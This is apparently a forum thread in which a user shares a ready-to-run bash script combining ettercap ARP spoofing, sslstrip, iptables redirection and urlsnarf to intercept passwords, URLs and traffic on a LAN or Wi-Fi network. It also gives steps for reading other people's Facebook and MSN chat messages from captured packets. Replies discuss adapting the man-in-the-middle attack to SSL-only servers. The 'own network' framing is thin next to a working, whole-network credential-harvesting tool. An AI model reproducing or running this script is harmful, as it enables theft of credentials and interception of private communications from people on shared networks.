Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urlsnarf

UPDATED SCRIPT 27/4 - added tcpxtract
UPDATE: How to find facebook chat messages...

I got very tired of writing commands endlessly while pentesting my network. So i started writing script for anything i do. This script is the one i use mostly.
Im still very new at Backtrack/Linux, but this script really works for me, and im sure other beginners out there can put it to good use as well.

First of all, make sure your etter.conf is default. Your etter.conf is located at /etc/etter.conf - this section must remain commented out:

Code:

---

# if you use iptables:
  #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
  #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

---

This is because i use ettercap to do the arpspoofing, but i dont want it to do the fake certificate thing (we have sslstrip to do the job).

Save this code to a new text file and save as anything.sh (make sure to chmod to execute, right click->properties->permissions->check "is executable")

Code:

---

#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci

---

Its pretty forward...

This script will execute sslstrip+log file, urlsnarf (dumping all the urls to a txt file), ettercap with arpspoofing+log files (with the passwords)+pcap file (for further analyze). all the files are put in the same folder, with identical filenames (of course with different extensions).
Furthermore when quitting the script (and ettercap) properly with the key "q", the script will clean up after itself (shutting down sslstrip,urlsnarf and flushing iptables). At last it automatically reads out passwords from the ettercap logfile (.eci) and runs wireshark for further analyze.

TIP: For me the easiest way to dump pictures from a pcap file (which the script generates), is by using NetworkMiner for windows. It runs smooth via wine, if you tweak it a bit like this tutorial shows: hxxp://geek00l.blogspot.com/2008/12/drunken-monkey-running-network-miner.html

HOW TO FIND MSN/FACEBOOK CHAT IN WIRESHARK:
Finding msn chat is easy. There are many EXPRESSIONS in wireshark, one has the name "MSNMS". If you apply that, it'll show you the messages.

Finding facebook chat is a bit more complicated. There are no EXPRESSION or filter to use. BUT i found out:
CTRL+F brings you the search packet command. search for: /ajax/chat/send.php
ATTENTION: in the search box, check the box that searches by "string" and in search in: Packet List.

That will give you the packets with the sent messages. When you select the packet, scroll down to the button and expand the "Line-based text data:"

There you'll have the message if you look carefully.

Its not that elegant...

I have not tested this with getting a message back. But that should be fairly easy and almost the same. You can always start the sniffer, send a message or receive a message and then stop sniffing. Then open the pcap in wireshark and look at the packets. Identify the one with the received message and find a way to search for such packet in the future.


Feel free to ask any questions.

Teddy Strand

looks nice but why not use wireshark instead?

For me, wireshark is far more advance and time consuming. I use wireshark to filter out other stuff, such as facebook chat messages, msn messenger etc.

Wireshark is also capable of showing these passwords, but i find the etterlog or the sslstrip log more fast. That being said, i still have much to learn about wireshark

hi tedbear,

thanks for the script. I know the feeling of being tired of writing commands endlessly...:->

I have a question though,

In your script you specify iptables redirection to port 10000, but I don't see where you start listening for that port. Do I assume that you are already running an instance of sslstrip that listens to port 10000?

Also, I have a general question for this sniffing strategy. Perhaps someone will be kind and answer :).

What if someone is running their web server on a different SSL port, say 8443...
So for this technique to work properly, do we specify the prerouting dst port to be 8443?

thanks in advance

tedbear, please ignore my question about port 10000 in my previous post (well if moderators post it soon enough). I read more about sslstrip and figured it out that its a default port it listens on...duh..

But I have another question though, a bit offtopic, but about the topic.

The attack you scripted above, as I understand (please correct me if I am wrong) works for the scenario below:

Victim --- MITM --- Gateway

Say if this passive attack is successful, then say (ie gmail) credentials of a user of host Victim will be logged in MITM host in clear text.

However, what about this scenario, is it doable? :

Victim ---- Gateway ---- MITM ---- Webserver (serves website via SSL).

Hope someone can answer... haven't tried it yet. Just want to see what people think...

I am new to this forum, and I see that posts need moderators approval... hopefully, my question will be posted.

As far as i know, the victim will never enter the ssl website at that port or any other port. Sslstrip "strips" the "s" of the https. So for this attack to work, the website visited by the victim has to support both http and https. Ie, visiting gmail connects to their https site, but with sslstrip activatted, victim gets "redirected" or "stripped" to http instead.

Not sure whether im explaining it so its understandable?

I believe that for the scenario,

Victim --- MITM --- Gateway

,when the victim goes to an https site, the website sends the user a certificate. The MITM intercepts that certificate and then sends the victim a fake certificate with a known encryption key. The victim sends the MITM the encrypted credentials which the MITM can decrypt since he sent the fake certificate to them with a known key. Once decrypted, the MITM encrypts the credentials with the real certificate key and sends it along to the website.

Also, for the scenario

Victim ---- Gateway ---- MITM ---- Webserver

I'm assuming you're talking about a basic NAT situation with a dhcp router or something in a home. In this case, a MITM attack will not work. A MITM attack is based on the ARP protocol, which is only used in LAN's. Read up on basic networking if you are unfamiliar with this.

thanks for your replies.

however, i am not talking about basic NAT situation, or a home LAN.

Let me add clarity:

Assume hypothetical situation. There is a webserver, router (use cisco for this example), and a victim (or victims). Say an adversary is able to do MITM attack between the Webserver and the default router the server talks to. (that is: MITM host is on that vlan, assume ARP poisoning is possible)

Router <-----> MITM (host) <------> Webserver

Where: Router (downstream net interface), MITM host, Webserver are all in the same subnet. Now to add more roadblocks to this scenario, lets assume the Webserver only provides its services (ie web mail) via SSL.

so, if at all possible, given the tools used in scenario 1, how would the attack tactic, strategy change for the latter situation.

Thoughts?


Disclaimer: The example and the scenario provided above is hypothetical only. The question is asked for educational purposes only. Any information, suggestion, or input provided to answer the question above will NOT be used to perform any illegal activity.

UPDATE:
After playing around a bit, I realized that the situation is trivial for the scenario 2.
All you need to do is to switch "places" :). I hope that makes sense...

I tested it, works perfectly.


But, can anybody answer this stupid question:

How to get the deciphered version of the Digest Authorization password???

Thanks for nice script!

But how should i use sslstrip with a proxy server?

nice script! i tested this on my own network and tried sniffing my own gmail info. in the pcap file i was able to see https packets but how where can i find the email/pw? >_< thanks.

You shouldn't see any https packets. That means somethings gone wrong. sslstrip "strips" the https: meaning that fx when entering gmail, it will go to http://gmail.com and not https://gmail.com <-- which is encrypted. Do you understand?

My guess is, that the arp poisoning went wrong. Try it again